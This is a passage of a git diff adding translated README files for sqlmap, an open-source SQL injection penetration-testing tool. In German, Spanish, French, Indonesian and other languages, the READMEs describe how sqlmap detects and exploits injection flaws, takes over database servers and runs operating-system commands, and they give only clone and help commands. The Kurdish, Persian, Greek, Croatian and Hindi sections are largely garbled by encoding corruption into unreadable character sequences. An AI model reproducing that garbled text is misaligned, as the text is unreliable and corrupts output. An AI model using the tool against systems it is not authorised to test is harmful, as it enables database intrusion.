+ +بۆ بینینی [Ú©Û†Ù…Û•ÚµÛŽÚ© سکرین شات Ùˆ سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت. + + +دامەزراندن +---- + +بۆ دابەزاندنی نوێترین وەشانی tarballØŒ کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت. + +باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap Ù„Û• دەرەوەی سندوق کاردەکات Ù„Û•Ú¯Û•Úµ [Python](https://www.python.org/download/) وەشانی **2.6**ØŒ **2.7** Ùˆ **3.x** لەسەر هەر پلاتÙۆرمێک. + +چۆنیەتی بەکارهێنان +---- + +بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان Ùˆ سویچەکان ئەمانە بەکاربهێنە: + + python sqlmap.py -h + +بۆ بەدەستهێنانی لیستی هەموو بژاردە Ùˆ سویچەکان ئەمە بەکار بێنا: + + python sqlmap.py -hh + +دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601). +بۆ بەدەستهێنانی تێڕوانینێکی گشتی Ù„Û• تواناکانی sqlmapØŒ لیستی تایبەتمەندییە پشتگیریکراوەکان، Ùˆ وەسÙکردنی هەموو هەڵبژاردن Ùˆ سویچەکان، Ù„Û•Ú¯Û•Úµ نموونەکان، ئامۆژگاریت دەکرێت Ú©Û• ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +بەستەرەکان +---- + +* ماڵپەڕی سەرەکی: https://sqlmap.org +* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Ùیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues +* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki +* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ÙˆÛŽÙ†Û•ÛŒ شاشە: https://github.com/sqlmapproject/sqlmap/wiki/ÙˆÛŽÙ†Û•ÛŒ شاشە + +وەرگێڕانەکان diff --git a/doc/translations/README-de-DE.md b/doc/translations/README-de-DE.md new file mode 100644 index 00000000000..65d96220ea5 --- /dev/null +++ b/doc/translations/README-de-DE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen. + +Screenshots +--- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Du kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen. + +Installation +--- + +[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv. + +Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. + +Benutzung +--- + +Um eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -h + +Um eine Liste alles Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -hh + +Ein Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmap's Fähigkeiten, unterstütze Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen. + +Links +--- + +* Webseite: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues +* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki +* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md new file mode 100644 index 00000000000..f85f4862fca --- /dev/null +++ b/doc/translations/README-es-MX.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". + +Capturas de Pantalla +--- +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). + +Instalación +--- + +Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.7** y **3.x** en cualquier plataforma. + +Uso +--- + +Para obtener una lista de opciones básicas: + + python sqlmap.py -h + +Para obtener una lista de todas las opciones: + + python sqlmap.py -hh + +Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601). +Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Enlaces +--- + +* Página principal: https://sqlmap.org +* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues +* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki +* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fa-IR.md b/doc/translations/README-fa-IR.md new file mode 100644 index 00000000000..eb84e410939 --- /dev/null +++ b/doc/translations/README-fa-IR.md @@ -0,0 +1,84 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + + +
+ + + +برنامه `sqlmap`ØŒ یک برنامه‌ی تست Ù†Ùوذ منبع باز است Ú©Ù‡ ÙØ±Ø¢ÛŒÙ†Ø¯ تشخیص Ùˆ اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام Ù…ÛŒ دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طی٠گسترده‌ای از اسکریپت ها می‌باشد Ú©Ù‡ برای متخصصان تست Ù†Ùوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم Ùˆ اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند. + + +تصویر محیط ابزار +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید. + + +نصب +---- + +برای دانلود اخرین نسخه tarballØŒ با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید. + + +نحوه Ø§Ø³ØªÙØ§Ø¯Ù‡ +---- + + +برای Ø¯Ø±ÛŒØ§ÙØª لیست ارگومان‌های اساسی می‌توانید از دستور زیر Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید: + + + +
+ + +``` + python sqlmap.py -h +``` + + + + +
+ + +برای Ø¯Ø±ÛŒØ§ÙØª لیست تمامی ارگومان‌ها می‌توانید از دستور زیر Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید: + +
+ + +``` + python sqlmap.py -hh +``` + + +
+ + +برای اجرای سریع Ùˆ ساده ابزار Ù…ÛŒ توانید از [اینجا](https://asciinema.org/a/46601) Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید. برای Ø¯Ø±ÛŒØ§ÙØª اطلاعات بیشتر در رابطه با قابلیت ها ØŒ امکانات قابل پشتیبانی Ùˆ لیست کامل امکانات Ùˆ دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. + + +لینک‌ها +---- + + +* خانه: https://sqlmap.org +* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues +* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki +* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* توییتر: [@sqlmap](https://x.com/sqlmap) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md new file mode 100644 index 00000000000..4d867898b97 --- /dev/null +++ b/doc/translations/README-fr-FR.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. + +---- + +![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__. + +Installation +---- + +Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.7** et **3.x** de [Python](https://www.python.org/download/) + +Utilisation +---- + +Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez: + + python sqlmap.py -h + +Pour afficher une liste complète des options et des commutateurs (switches), tapez: + + python sqlmap.py -hh + +Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. +Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Liens +---- + +* Page d'acceuil: https://sqlmap.org +* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues +* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki +* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md new file mode 100644 index 00000000000..0d5e0446570 --- /dev/null +++ b/doc/translations/README-gr-GR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +Το sqlmap είναι Ï€ÏόγÏαμμα Î±Î½Î¿Î¹Ï‡Ï„Î¿Ï ÎºÏŽÎ´Î¹ÎºÎ±, που αυτοματοποιεί την εÏÏεση και εκμετάλλευση ευπαθειών Ï„Ïπου SQL Injection σε βάσεις δεδομένων. ΈÏχεται με μια δυνατή μηχανή αναγνώÏισης ευπαθειών, πολλά εξειδικευμένα χαÏακτηÏιστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εÏÏος επιλογών αÏχίζοντας από την αναγνώÏιση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχÏι και Ï€Ïόσβαση στο βαθÏτεÏο σÏστημα αÏχείων και εκτέλεση εντολών στο απευθείας στο λειτουÏγικό μέσω εκτός ζώνης συνδέσεων. + +Εικόνες +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ΜποÏείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνÏουν κάποια από τα χαÏακτηÏιστικά. + +Εγκατάσταση +---- + +Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Κατά Ï€Ïοτίμηση, μποÏείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήÏιο: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +Το sqlmap λειτουÏγεί χωÏίς πεÏαιτέÏω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.7** και **3.x** σε όποια πλατφόÏμα. + +ΧÏήση +---- + +Για να δείτε μια βασική λίστα από επιλογές πατήστε: + + python sqlmap.py -h + +Για να πάÏετε μια λίστα από όλες τις επιλογές πατήστε: + + python sqlmap.py -hh + +ΜποÏείτε να δείτε ένα δείγμα λειτουÏγίας του Ï€ÏογÏάμματος [εδώ](https://asciinema.org/a/46601). +Για μια γενικότεÏη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηÏιζόμενων χαÏακτηÏιστικών και πεÏιγÏαφή για όλες τις επιλογές, μαζί με παÏαδείγματα, καλείστε να συμβουλευτείτε το [εγχειÏίδιο χÏήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ΣÏνδεσμοι +---- + +* ΑÏχική σελίδα: https://sqlmap.org +* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ΠÏοβλήματα: https://github.com/sqlmapproject/sqlmap/issues +* ΕγχειÏίδιο ΧÏήστη: https://github.com/sqlmapproject/sqlmap/wiki +* Συχνές ΕÏωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md new file mode 100644 index 00000000000..45d5eaad1f9 --- /dev/null +++ b/doc/translations/README-hr-HR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoÅ¡tvom korisnih opcija za napredno penetracijsko testiranje te Å¡iroki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datoteÄnom sustavu i izvrÅ¡avanja komandi na operacijskom sustavu koriÅ¡tenjem tzv. "out-of-band" veza. + +Slike zaslona +---- + +![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od znaÄajki na wiki stranicama. + +Instalacija +---- + +Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahtjeva koriÅ¡tenjem [Python](https://www.python.org/download/) verzije **2.7** i/ili **3.x** na bilo kojoj platformi. + +KoriÅ¡tenje +---- + +Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidaÄa koristite: + + python sqlmap.py -hh + +Možete pronaći primjer izvrÅ¡avanja [ovdje](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih znaÄajki te opis svih opcija i prekidaÄa, zajedno s primjerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Poveznice +---- + +* PoÄetna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki +* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md new file mode 100644 index 00000000000..f82bf71d2ec --- /dev/null +++ b/doc/translations/README-id-ID.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data. + +sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. + +Tangkapan Layar +---- + +![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. + +Instalasi +---- + +Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.7** dan **3.x** pada platform apapun. + +Penggunaan +---- + +Untuk mendapatkan daftar opsi dasar gunakan perintah: + + python sqlmap.py -h + +Untuk mendapatkan daftar opsi lanjutan gunakan perintah: + + python sqlmap.py -hh + +Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). + +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Tautan +---- + +* Situs: https://sqlmap.org +* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues +* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki +* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) +* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md new file mode 100644 index 00000000000..b311f81afe3 --- /dev/null +++ b/doc/translations/README-in-HI.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap à¤à¤• ओपन सोरà¥à¤¸ पà¥à¤°à¤µà¥‡à¤¶ परीकà¥à¤·à¤£ उपकरण है जो SQL इनà¥à¤œà¥‡à¤•à¥à¤¶à¤¨ दोषों की पहचान और उपयोग की पà¥à¤°à¤•à¥à¤°à¤¿à¤¯à¤¾ को सà¥à¤µà¤šà¤²à¤¿à¤¤ करता है और डेटाबेस सरà¥à¤µà¤°à¥‹à¤‚ को अधिकृत कर लेता है। इसके साथ à¤à¤• शकà¥à¤¤à¤¿à¤¶à¤¾à¤²à¥€ पहचान इंजन, अंतिम पà¥à¤°à¤µà¥‡à¤¶ परीकà¥à¤·à¤• के लिठकई निचले विशेषताà¤à¤ और डेटाबेस पà¥à¤°à¤¿à¤‚ट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिसà¥à¤Ÿà¤® तक पहà¥à¤à¤šà¤¨à¥‡ और आउट-ऑफ-बैंड कनेकà¥à¤¶à¤¨ के माधà¥à¤¯à¤® से ऑपरेटिंग सिसà¥à¤Ÿà¤® पर कमांड चलाने के लिठकई बड़े रेंज के सà¥à¤µà¤¿à¤š शामिल हैं। + +चितà¥à¤°à¤¸à¤‚वाद +---- + +![सà¥à¤•à¥à¤°à¥€à¤¨à¤¶à¥‰à¤Ÿ](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कà¥à¤› फीचरà¥à¤¸ की दिखाते हà¥à¤ छवियों का संगà¥à¤°à¤¹ देख सकते हैं। + +सà¥à¤¥à¤¾à¤ªà¤¨à¤¾ +---- + +आप नवीनतम तारबाल को [यहां कà¥à¤²à¤¿à¤• करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां कà¥à¤²à¤¿à¤• करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं। + 